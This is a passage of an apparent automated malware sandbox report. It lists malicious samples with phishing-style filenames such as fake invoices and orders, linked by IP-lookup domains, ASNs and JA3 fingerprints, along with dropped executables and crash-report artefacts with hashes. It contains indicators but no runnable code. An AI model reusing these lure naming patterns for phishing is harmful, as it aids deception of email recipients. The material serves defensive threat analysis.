freegeoip.app | full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | NEW ORDER.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | ProcessingIConnect.Common..TermsConditions.z.pdf.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | PO 642021.exe | Get hash | malicious | Browse | 104.21.19.200
freegeoip.app | 00000000000000000090.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | New Order.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | IMG_1660392.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | IMG_1660392.doc | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | NS_PO_86655443.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | INV#1191189.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | NEW PURCHASE#U00c3#U00bf #U00c3#U00bfORDER.exe | Get hash | malicious | Browse | 104.21.19.200
freegeoip.app | 0009752202_OUTSTANDING_20210129,PDF.exe | Get hash | malicious | Browse | 172.67.188.154
freegeoip.app | CITI SOLUTION COMPANY PROFILE.exe | Get hash | malicious | Browse | 172.67.188.154
whatismyipaddress.com | Orders.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | nzGUqSK11D.exe | Get hash | malicious | Browse | 104.16.154.36
whatismyipaddress.com | PO 2010029_pdf Quotation from Alibaba Ale.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | PO 2010029_pdf Quotation from Alibaba Ale.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | hkaP5RPCGNDVq3Z.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | B6LNCKjOGt5EmFQ.exe | Get hash | malicious | Browse | 104.16.154.36
whatismyipaddress.com | NDt93WWQwd089H7.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | JkhR5oeRHA.exe | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | PURCHASE ORDER.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | BANK-STATMENT _xlsx.exe | Get hash | malicious | Browse | 104.16.154.36
whatismyipaddress.com | INQUIRY.exe | Get hash | malicious | Browse | 104.16.154.36
whatismyipaddress.com | Prueba de pago.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | 879mgDuqEE.jar | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | remittance1111.jar | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | 879mgDuqEE.jar | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | remittance1111.jar | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | https://my-alliances.co.uk/ | Get hash | malicious | Browse | 66.171.248.178
whatismyipaddress.com | c9o0CtTIYT.exe | Get hash | malicious | Browse | 104.16.154.36
whatismyipaddress.com | mR3CdUkyLL.exe | Get hash | malicious | Browse | 104.16.155.36
whatismyipaddress.com | 6JLHKYvboo.exe | Get hash | malicious | Browse | 104.16.155.36

ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
DYNDNSUS | Payment Advice.exe | Get hash | malicious | Browse | 131.186.113.70
DYNDNSUS | SALES.exe | Get hash | malicious | Browse | 131.186.113.70
DYNDNSUS | Revised Invoice.exe | Get hash | malicious | Browse | 216.146.43.70
DYNDNSUS | RFQ - 0201201.exe | Get hash | malicious | Browse | 162.88.193.70
DYNDNSUS | Statement.pdf.exe | Get hash | malicious | Browse | 131.186.113.70
DYNDNSUS | Purchase Order.exe | Get hash | malicious | Browse | 131.186.113.70
DYNDNSUS | New Order.exe | Get hash | malicious | Browse | 162.88.193.70
DYNDNSUS | orden010221.exe | Get hash | malicious | Browse | 131.186.113.70
DYNDNSUS | CMR2OEYL.exe | Get hash | malicious | Browse | 216.146.43.71
DYNDNSUS | full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exe | Get hash | malicious | Browse | 131.186.161.70
DYNDNSUS | NEW ORDER.exe | Get hash | malicious | Browse | 216.146.43.70
DYNDNSUS | ProcessingIConnect.Common..TermsConditions.z.pdf.exe | Get hash | malicious | Browse | 216.146.43.71
DYNDNSUS | PO 642021.exe | Get hash | malicious | Browse | 162.88.193.70
DYNDNSUS | 00000000000000000090.exe | Get hash | malicious | Browse | 216.146.43.71
DYNDNSUS | New Order.exe | Get hash | malicious | Browse | 216.146.43.71
DYNDNSUS | IMG_1660392.exe | Get hash | malicious | Browse | 216.146.43.70
DYNDNSUS | IMG_1660392.doc | Get hash | malicious | Browse | 216.146.43.70
DYNDNSUS | NS_PO_86655443.exe | Get hash | malicious | Browse | 131.186.161.70
DYNDNSUS | INV#1191189.exe | Get hash | malicious | Browse | 216.146.43.71
DYNDNSUS | NEW PURCHASE#U00c3#U00bf #U00c3#U00bfORDER.exe | Get hash | malicious | Browse | 162.88.193.70
CLOUDFLARENETUS | Payment Advice.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | SALES.exe | Get hash | malicious | Browse | 104.21.19.200
CLOUDFLARENETUS | Revised Invoice.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | RFQ - 0201201.exe | Get hash | malicious | Browse | 104.21.19.200
CLOUDFLARENETUS | Statement.pdf.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | Purchase Order.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | New Order.exe | Get hash | malicious | Browse | 172.67.188.154
CLOUDFLARENETUS | NEW ENQUIRY.xlsx | Get hash | malicious | Browse | 104.22.0.232
CLOUDFLARENETUS | SOA - NCL INTER LOGISTICS.xlsx | Get hash | malicious | Browse | 104.22.1.232
CLOUDFLARENETUS | CSWWOe1Gnx.html | Get hash | malicious | Browse | 104.16.19.94
CLOUDFLARENETUS | PO_210202.exe | Get hash | malicious | Browse | 23.227.38.32
CLOUDFLARENETUS | Invoice764895.xls | Get hash | malicious | Browse | 172.67.193.211
CLOUDFLARENETUS | Invoice764895.xls | Get hash | malicious | Browse | 104.21.76.113
CLOUDFLARENETUS | po.exe.exe | Get hash | malicious | Browse | 23.227.38.74
CLOUDFLARENETUS | CMR2OEYL.exe | Get hash | malicious | Browse | 104.21.19.200
CLOUDFLARENETUS | 129ZD381.xls | Get hash | malicious | Browse | 172.67.204.162
CLOUDFLARENETUS | 129ZD381.xls | Get hash | malicious | Browse | 172.67.204.162
CLOUDFLARENETUS | q2EKWldniJ.exe | Get hash | malicious | Browse | 104.16.16.194
CLOUDFLARENETUS | evil.doc | Get hash | malicious | Browse | 104.16.126.175
CLOUDFLARENETUS | full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exe | Get hash | malicious | Browse | 172.67.188.154

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Payment Advice.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | SALES.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | Revised Invoice.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | RFQ - 0201201.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | Statement.pdf.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | Purchase Order.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | New Order.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | CMR2OEYL.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | full set of ball valve components ready for assembly. Assembly weldingtestingpainting.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | NEW ORDER.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | OOLU2115327710.xls.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | ProcessingIConnect.Common..TermsConditions.z.pdf.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | SOPORTEDE.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | POinv00393.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | PO 642021.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | 00000000000000000090.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | New Order.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | IMG_1660392.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | mEPx5H8svq.exe | Get hash | malicious | Browse | 104.21.19.200
54328bd36c14bd82ddaa0c04b25ed9ad | NS_PO_86655443.exe | Get hash | malicious | Browse | 104.21.19.200

                                                                                          Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Orders.exe | malicious
C:\Users\user\AppData\Local\Temp\origigoods20.exe | Orders.exe | malicious
C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Orders.exe | malicious
C:\Users\user\AppData\Local\Temp\origigoods40.exe | Orders.exe | malicious

                                                                                                  Created / dropped Files

                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_697020edb13ed8bc761f5d6b0de413dddfcbfb_b4666e22_12f099c3\Report.wer
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17818
                                                                                                  Entropy (8bit):3.766553825659537
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:UwHLs3pHBUZMXJyBaPLk9Mg5N3gFm1pzvnuk1+K1QtKVzss/u7sVS274Itmxeon:rLs3ZBUZMXiayRv1jz3/u7sVX4ItOd
                                                                                                  MD5:1B14E26F15C08169BD1E448474C1F7AB
                                                                                                  SHA1:3FF1E3F413BDD11D5784E94EFCDFE0609CD50B1A
                                                                                                  SHA-256:B680E94518074E808301D5E76EA73ACACCFF2FEC67401CCD13B2C039780F6F65
                                                                                                  SHA-512:682801D9682FDF42DBB98535EAA07596432BCDA55855477CFD0D2FA04C0FAB2A1F4B5E4E208CB87EB417772EF0848BDEE0ECEC71FA1281CE3737419AFB9A4C23
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.4.0.9.0.7.4.3.2.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.4.5.3.1.2.9.5.8.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.5.b.c.c.8.c.-.2.5.b.4.-.4.a.6.4.-.9.5.6.8.-.8.c.8.e.1.2.a.2.0.a.b.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.e.5.f.a.8.c.-.a.a.3.8.-.4.7.5.6.-.9.b.3.b.-.5.d.5.d.6.a.8.3.8.0.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.a.w.k.g.o.o.d.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.7.-.3.7.9.8.-.7.7.d.a.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_697020edb13ed8bc761f5d6b0de413dddfcbfb_b4666e22_1b230661\Report.wer
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17916
                                                                                                  Entropy (8bit):3.7657882578191666
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:xt91Q3pHBUZMXJyBaKsn9fbeN9M2v1zzvSXk0ZKjBIcQr+s/u7s4S274ItmxeY:h1Q3ZBUZMXiaEdvh/sl/u7s4X4ItOF
                                                                                                  MD5:6FE02F566E5BC86C856A4746E5B1B37E
                                                                                                  SHA1:45764D32FED814C6E0E4D3D7A498DC74ECCD2EE3
                                                                                                  SHA-256:3317003BFF2506D41F1DCCB35B30D0C8D94F389E40D7A77242DA1C7456C05268
                                                                                                  SHA-512:DF8BC7E1E759B493C00C697ACBBDA26C88B7FEC6152F627311697B17E65500C25B245907989AC275985296CFCF11EBDD13760D724AC527A4A24915C314CFF029
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.3.1.6.5.2.6.3.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.5.2.1.5.2.5.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.1.e.4.f.3.3.-.4.c.0.f.-.4.f.1.b.-.9.c.3.2.-.5.c.3.e.a.3.d.7.e.8.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.3.f.9.2.a.c.e.-.4.5.3.0.-.4.8.4.d.-.8.2.8.a.-.f.2.5.7.1.3.c.5.6.8.8.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.a.w.k.g.o.o.d.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.c.-.0.0.0.1.-.0.0.1.7.-.6.9.7.2.-.c.b.b.1.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_93f07d9c4f92cda17563b29cabdf995c588ef9_00000000_14dc0d13\Report.wer
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16862
                                                                                                  Entropy (8bit):3.758463269003457
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:PmLhQmV4yBaPLk9Mg5N3gFm1pzvnuk1+K1QtKVzz/u7sVS274ItiLn:eLhQSayRv1jzz/u7sVX4Iten
                                                                                                  MD5:5B656D3CB77E098CA4DF1D1C0CE0E328
                                                                                                  SHA1:ABA48932FBF3EC81ADA9341DE6B97AC4668AD94C
                                                                                                  SHA-256:85D229EC5FFF7DBF8DDC2CEFA7281BD453B84E1D3F70204FE83A582F0246D164
                                                                                                  SHA-512:928397B3DD92C244E5916D7FD3B61EB2B9E0B3794D6CB477BDADB6CBD75090FCA850DDC950DA714E89484EFF60684E6AE742C73930D6F83BAE3AE2FA665B9962
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.8.5.1.0.5.6.3.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.8.9.5.1.1.8.4.8.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.0.4.6.f.6.c.2.-.1.4.1.c.-.4.8.8.c.-.9.4.4.0.-.e.a.0.f.5.9.8.2.7.2.3.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.4.0.-.0.0.0.1.-.0.0.1.7.-.3.7.9.8.-.7.7.d.a.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.2.8.5.c.6.!.h.a.w.k.g.o.o.d.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.9.:.1.0.:.0.8.:.3.8.!.0.!.h.a.w.k.g.o.o.d.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5...
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_hawkgoods.exe_93f07d9c4f92cda17563b29cabdf995c588ef9_00000000_1a4a83a4\Report.wer
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16958
                                                                                                  Entropy (8bit):3.758176808526625
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:sK11QmV4yBaKsn9fbeN9M2v1zzvSXk0ZKjBIcQry/u7sTS274Itip:111QSaEdvh/sy/u7sTX4Itg
                                                                                                  MD5:E69F7F2D40A3282E3A5C4D25F316EEFD
                                                                                                  SHA1:FF12BFC6A914E52FD5A233C18C99BF7E128DFC10
                                                                                                  SHA-256:2D0F631D768C4D0B5FA1211D11CAE7F657DB56553606E18FCF4E5CE04878607A
                                                                                                  SHA-512:1C0F891A498A9D74A59A09285423C3173248E2A715F6C43D8499EA9EEA1556CB536A9D8118E81AEECA94936C0AC78F29B6422ADF28D008C80085299D299EFBA0
                                                                                                  Malicious:true
                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.6.7.5.8.3.1.6.0.9.0.1.7.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.6.7.5.8.3.1.8.7.3.0.7.9.8.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.4.9.1.a.8.b.5.-.7.b.7.d.-.4.6.4.e.-.8.7.5.0.-.7.c.9.c.1.4.1.a.8.6.c.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.h.u.l.l.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.8.c.-.0.0.0.1.-.0.0.1.7.-.6.9.7.2.-.c.b.b.1.8.3.f.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.6.c.c.9.4.0.d.7.a.0.d.3.0.a.e.2.8.3.f.a.7.7.b.e.8.f.e.6.4.d.3.0.0.0.0.0.0.0.0.!.0.0.0.0.d.6.e.4.a.3.c.a.2.5.3.b.f.c.3.7.2.a.9.a.3.1.8.0.b.5.8.8.7.c.7.1.6.e.d.2.8.5.c.6.!.h.a.w.k.g.o.o.d.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.1././.1.9.:.1.0.:.0.8.:.3.8.!.0.!.h.a.w.k.g.o.o.d.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5...
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F33.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):6346
                                                                                                  Entropy (8bit):3.727723917153232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNiJn66RY0SwZCpra89bvcsfRlm:RrlsNiJ6EY0SwCvvfK
                                                                                                  MD5:D9A75C2F37E77481D156E098A916F868
                                                                                                  SHA1:586C14F42B7EFA8A883FAA53B416F0C491B218B7
                                                                                                  SHA-256:AAA58719C37F44B8FD215C19F46455439079D3B8AFB77BCD1212947B45474CC6
                                                                                                  SHA-512:F4E44BB08682D51682622FD695C6F2DBBA11DFCE95702B5857F46BDE655B9F5C5FBD88148602A7167B334CA8E10917671F530FF9BC6123EEB3EBBC40E6BB0414
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.0.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER3BB7.tmp.xml
                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4658
                                                                                                  Entropy (8bit):4.484087176387836
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:cvIwSD8zscJgtWI9HnWSC8BAb8fm8M4JUkZFI+q84UZ/URyHwd:uITfaoWSNBJJUoZcRyHwd
                                                                                                  MD5:745EBD9EB867F5C20629FE5A76B20E2E
                                                                                                  SHA1:01E88CAA25F3BBF0E69ECBE25A51CC8ED1975EA3
                                                                                                  SHA-256:8983A0C40000ABE4FB9D2FAD11770B2177CF7960842134582B219551BF357DC6
                                                                                                  SHA-512:D65656378EB01D6F1F094C27EB95DE2F10774F68BC4AE266C40EA16975DF60212515A5CC7FE23039FEE53B1871338F4DBD78C24D70AE3F5F9CF1054D12924FCF
                                                                                                  Malicious:false
                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="843964" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER72DC.tmp.WERInternalMetadata.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7646
                                                                                                  Entropy (8bit):3.6935655205790683
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Rrl7r3GLNie3696YaD36XLgmfZSnS/ZCp17nX1ffJm:RrlsNi+696Yc36XLgmfInS/A7nlfs
                                                                                                  MD5:B831102B11FA3395D755D1BB81097289
                                                                                                  SHA1:11843E55B390CE8A5FAD48F342F244C938FF4B1A
                                                                                                  SHA-256:C765D0D67F63F562E8E3817D0513C0FA99456485788DCA02DC80E33D4538747D
                                                                                                  SHA-512:18ECA65B3A6C624CC9A23C9CF96550CFBBD5D08784D973E342D7DD0D244B640E4A36A0D86B22896D8747C168AE0286084AC23840FE44F89C35A67F2D333ABAD5
                                                                                                  Malicious:false
                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.2.4.<./.P.i.d.>.......
                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER7473.tmp.xml
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
